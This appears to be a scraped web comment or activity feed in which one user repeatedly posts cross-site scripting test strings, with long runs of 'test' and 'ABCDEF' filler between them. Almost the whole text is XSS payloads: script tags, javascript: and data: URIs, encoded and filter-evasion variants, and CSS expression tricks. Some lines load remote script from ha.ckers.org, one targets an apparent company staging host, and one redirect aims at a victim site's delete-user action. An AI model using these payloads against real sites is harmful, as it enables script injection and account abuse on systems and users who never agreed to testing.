javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
Activity Newest / Oldest
Mohamed Ashraf
<IMG SRC="https://www.app.stg.gameball.co/cd.php?somevariables=maliciouscode">
Mohamed Ashraf
<IMG SRC="https://www.app.stg.gameball.co/cd.php?somevariables=maliciouscode">
Mohamed Ashraf
<IMG SRC="https://www.app.stg.gameball.co/somecommand.php?somevariables=maliciouscode">
Mohamed Ashraf
<IMG SRC="app.stg.gamball.co/somecommand.php?somevariables=maliciouscode">
Mohamed Ashraf
$ltIMG SRC="app.stg.gamball.co/somecommand.php?somevariables=maliciouscode">
Mohamed Ashraf
>">alert(561177485777)%3B
Mohamed Ashraf
<IMG SRC="livescript:[code]">
Mohamed Ashraf
<META HTTP-EQUIV="refresh" CONTENT="0; URL=;URL=javascript:alert('XSS');">
Mohamed Ashraf
google.com
Mohamed Ashraf
<HTML xmlns:xss>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<XML SRC="ha.ckers.org/xsstest.xml" ID=I></XML>
<HTML><BODY>
<!--[if gte IE 4]>
Mohamed Ashraf
";alert('XSS');//
Mohamed Ashraf
<IMG SRC="jav
ascript:alert('XSS');">
Mohamed Ashraf
<<SCRIPT>alert("XSS");//<</SCRIPT>
Mohamed Ashraf
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Mohamed Ashraf
<A HREF="javascript:document.location='www.google.com/'">XSS</A>
Mohamed Ashraf
<A HREF="www.google.com./">XSS</A>
Mohamed Ashraf
<A HREF="www.gohttp://www.google.com/ogle.com/">XSS</A>
Mohamed Ashraf
[xC0][xBC]script>document.vulnerable=true;[xC0][xBC]/script>
Mohamed Ashraf
</script><script>alert(1)</script>
Mohamed Ashraf
"><BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
Mohamed Ashraf
</br style=a:expression(alert())>
Mohamed Ashraf
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
Mohamed Ashraf
=(◕_◕)=
Mohamed Ashraf
document.vulnerable=true;
Mohamed Ashraf
document.vulnerable=true;;
Mohamed Ashraf
%3cscript%3ealert('XSS')%3c/script%3e
Mohamed Ashraf
%22%3e%3cscript%3ealert('XSS')%3c/script%3e
Mohamed Ashraf
%253cscript%253ealert(1)%253c/script%253e
Mohamed Ashraf
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="ha.ckers.org/xss.css">
<STYLE>@import'ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss>
Mohamed Ashraf
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Mohamed Ashraf
<META HTTP-EQUIV="refresh" CONTENT="0; URL=;URL=javascript:alert('XSS');">
Mohamed Ashraf
<IMG SRC="mocha:[code]">
Mohamed Ashraf
<IMG SRC="livescript:[code]">
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=;URL=javascript:alert('XSS');">
<IMG SRC="mocha:[code]">
Mohamed Ashraf
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC="www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser
exp/*<XSS STYLE='noxss:noxss("*//*");
Mohamed Ashraf
<DIV STYLE="width: expression(alert('XSS'));">
Mohamed Ashraf
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<IMG SRC=" javascript:alert('XSS');">
perl -e 'print "<SCR�IPT>alert(\"XSS\")</SCR�IPT>";' > out
perl -e 'print "<IMG SRC=java�script:alert(\"XSS\")>";' > out
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Mohamed Ashraf
<IMG SRC="javascript:alert('XSS')">
Mohamed Ashraf
<IMG SRC="javascript:alert('XSS')"
Mohamed Ashraf
<
<
<
<
<
<
<
<
<
<
<
<
Mohamed Ashraf
<
Mohamed Ashraf
<
Mohamed Ashraf
<A HREF="http://www.google.com./">XSS</A>
Mohamed Ashraf
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Mohamed Ashraf
c="javascript:";
Mohamed Ashraf
d="alert('XSS');\")";
Mohamed Ashraf
eval(a+b+c+d);
Mohamed Ashraf
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Mohamed Ashraf
<XSS STYLE="behavior: url(xss.htc);">
Mohamed Ashraf
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
Mohamed Ashraf
<IMG SRC='vbscript:msgbox("XSS")'>
Mohamed Ashraf
<IMG SRC="mocha:[code]">
Mohamed Ashraf
<IMG LOWSRC="javascript:alert('XSS')">
Mohamed Ashraf
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Mohamed Ashraf
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
Mohamed Ashraf
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<
Mohamed Ashraf
";alert('XSS');//
Mohamed Ashraf
perl -e 'print "";' > out
Mohamed Ashraf
'';!--"=&{()}
Mohamed Ashraf
>">'>alert(String.fromCharCode(88,83,83))
Mohamed Ashraf
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
Mohamed Ashraf
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
Mohamed Ashraf
X
Mohamed Ashraf
+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
Mohamed Ashraf
+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
X
Mohamed Ashraf
Mohamed Ashraf
XXX
Mohamed Ashraf
/* *x00/javascript:alert(1)// */
Mohamed Ashraf
/* *x2A/javascript:alert(1)// */
Mohamed Ashraf
if("x\xE1x96x89".length==2) { javascript:alert(1);}
Mohamed Ashraf
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
Mohamed Ashraf
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
Mohamed Ashraf
"/>
Mohamed Ashraf
test
test
test
test
test
test
test
test
test
test
test
test
test
test
Mohamed Ashraf
"'`>a='hellox27;javascript:alert(1)//';
Mohamed Ashraf
test
Mohamed Ashraf
`"'>
Mohamed Ashraf
-->
Mohamed Ashraf
-->
Mohamed Ashraf
-->
Mohamed Ashraf
--> -->
Mohamed Ashraf
javascript:alert(1)
Mohamed Ashraf
'"`>/* *x2Fjavascript:alert(1)// */
Mohamed Ashraf
x3Cscript>javascript:alert(1)
Mohamed Ashraf
x3Cscript>javascript:alert(1)
Mohamed Ashraf
Mohamed Ashraf
Mohamed Ashraf
Mohamed Ashraf
hola
Mohamed Ashraf
hialert(5);
Mohamed Ashraf
hijavascript:alert("5");
Mohamed Ashraf
hi
Mohamed Ashraf
hi